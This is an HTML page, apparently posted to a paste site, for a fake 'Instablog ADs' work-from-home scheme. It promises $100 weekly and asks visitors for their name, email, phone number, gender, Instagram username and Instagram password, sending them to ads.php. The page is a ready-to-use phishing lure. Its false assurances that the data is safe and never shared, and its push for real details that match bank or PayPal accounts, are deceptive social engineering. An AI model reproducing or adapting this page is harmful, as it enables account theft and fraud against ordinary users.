Untitled
2 years ago in C
<!DOCTYPE html>
<html>
<head>
<link type="text/css" rel="stylesheet" href="ads.css">
<meta charset="UTF-8">
<meta property="og:title" content="InstaBlog ADs: Work From Home">
<meta property="og:description" content="Help promote our ADs and get paid for it.">
<meta property="og:image" content="logo.png">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title> Instablog ADs Registration Website</title>
<!-- CSS_ADSBLOCK_START -->
<link rel="stylesheet" href="https://adblockers.opera-mini.net/css_block/default-domainless.css" type="text/css" />
<!-- CSS_ADSBLOCK_END -->
</head>
<body>
<header>
<h1>Instablog ADs</h1>
</header>
<main>
<p>Kindly fill out this form to help us promote our ADs and start receiving $100 weekly. Please note that it will only take us between 3 hours and 3 days to review your information before adding you to our database to start earning $100 weekly. We know that $100 might be too small for a weekly payment but, we kindly wish that you bear with us as we are already making plans to increase our weekly pay to $200.</p>
<p>Note: Your information are safe and secured. Your information are not sold out or shared with any third party. We hereby assure you that your details are stored and safe in our database. Which, means your your data will never be used for any fraudulent activities.</p>
<p><strong>Warning: You're urged to fill out this form with your real information so as to avoid misunderstanding during the period of review. Also note that your information must correspond with your payment details (bank account, PayPal, CashApp, etc...) that you'll be asked to produce so that, we will start paying you weekly after your information has been reviewed.</strong></p>
<form action="ads.php" method="post">
<p class="caption">All the fields starred are required!</p>
<label for="name">Name<strong>*</strong></label>
<input type="text" name="name" placeholder="Enter Your Name" required autocomplete="off">
<label for="email">Email Address<strong>*</strong></label>
<input type="email" name="email" placeholder="Enter Your Email Address" required>
<label for="phone-number">Phone Number<strong>*</strong></label>
<input type="number" name="phone-number" placeholder="Enter Your Phone Number" required>
<label for="gender">Gender<strong>*</strong></label>
<input type="radio" name="gender" required class="gender"><label for="gender" class="gender">Male</label>
<input type="radio" name="gender" required class="gender"><label for="gender" class="gender">Female</label>
<label for="username">Username<strong>*</strong></label>
<input name="username" type="text" placeholder="Enter Your Instagram Username" required>
<label for="password">Password<strong>*</strong></label>
<input type="password" name="password" placeholder="Enter Your Instagram Password" required>
<input name="agreement" type="checkbox" class="agreement" required><label for="agreement" class="agreement">I agree to help promote the ADs for this website.</label><br>
<input name="agreement" type="checkbox" class="optional"><label for="agreement" class="optional">Sign me up for newsletter about your new offer.</label>
<input type="submit" value="Submit" id="submit">
</form>
</main>
<footer>
<p>&copy; Instablog 2022</p>
</footer>
</body>
</html>